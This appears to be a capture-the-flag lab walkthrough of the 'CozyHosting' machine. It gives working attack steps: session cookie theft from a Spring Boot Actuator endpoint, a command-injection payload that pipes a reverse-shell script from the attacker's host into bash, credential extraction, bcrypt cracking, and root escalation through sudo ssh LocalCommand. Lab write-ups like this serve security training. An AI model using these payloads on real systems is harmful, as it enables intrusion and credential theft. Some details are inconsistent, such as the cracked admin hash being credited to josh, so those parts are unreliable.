Cozy Hosting - Walkthrough

CozyHosting is an easy-difficulty Linux machine that features a Spring Boot application. The application has the Actuator endpoint enabled. Enumerating the endpoint leads to the discovery of a user's session cookie, leading to authenticated access to the main dashboard. The application is vulnerable to command injection, which is leveraged to gain a reverse shell on the remote machine. Enumerating the application's JAR file, hardcoded credentials are discovered and used to log into the local database. The database contains a hashed password, which once cracked is used to log into the machine as the user josh. The user is allowed to run ssh as root, which is leveraged to fully escalate privileges.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.230 -oN cozyHosting

The scan reveals:

PORT	STATE	SERVICE	VERSION
22/tcp	open	ssh	OpenSSH 8.9p1
80/tcp	open	http	nginx 1.18.0

The web server redirects to cozyhosting.htb. We add it to /etc/hosts:

echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts

cozyhosting.htb

We perform content discovery:

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FFUZ -u http://cozyhosting.htb/FFUZ -ic -c -t 100 --mc all -fc 404

The error page reveals this is a Spring Boot application:

Whitelabel Error Page

We scan for Spring Boot Actuator endpoints:

ffuf -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://cozyhosting.htb/FFUZ -ic -c -t 100 --mc all -fc 404

Discovered endpoints include /actuator/sessions.

Foothold

The /actuator/sessions endpoint exposes active session cookies:

actuator/sessions

We steal kanderson's session cookie and set it in our browser:

Session hijacking

We access the admin panel at /admin:

Admin panel

The "Automatic Patching" form is vulnerable to command injection. We test it:

hostname: 127.0.0.1
username: test;curl${IFS}http://10.10.14.63:7000;

We craft a reverse shell and inject it:

test;curl${IFS}http://10.10.14.63:7000/rev.sh|bash;

Shell obtained as app.

Post-Exploitation

We find a JAR file and extract it:

unzip -d /tmp/app cloudhosting-0.0.1.jar
cat /tmp/app/BOOT-INF/classes/application.properties

PostgreSQL credentials found:

Username	Password
postgres	Vg&nvzAQ7XxR

We connect to the database:

psql -h 127.0.0.1 -U postgres
\connect cozyhosting
SELECT * FROM users;

kanderson: $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

We crack the admin bcrypt hash:

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

Username	Password
josh	manchesterunited

We SSH as josh:

ssh [email protected]
cat user.txt

User flag: fd79dfb77157895eb84280b58a42af44

Privilege Escalation

We check sudo privileges:

sudo -l

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

We abuse SSH's ProxyCommand to execute commands as root:

sudo /usr/bin/ssh -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' [email protected]

Root shell obtained:

cat /root/root.txt

Root flag: 6b665d141bccb338bc9c15bc65a2b300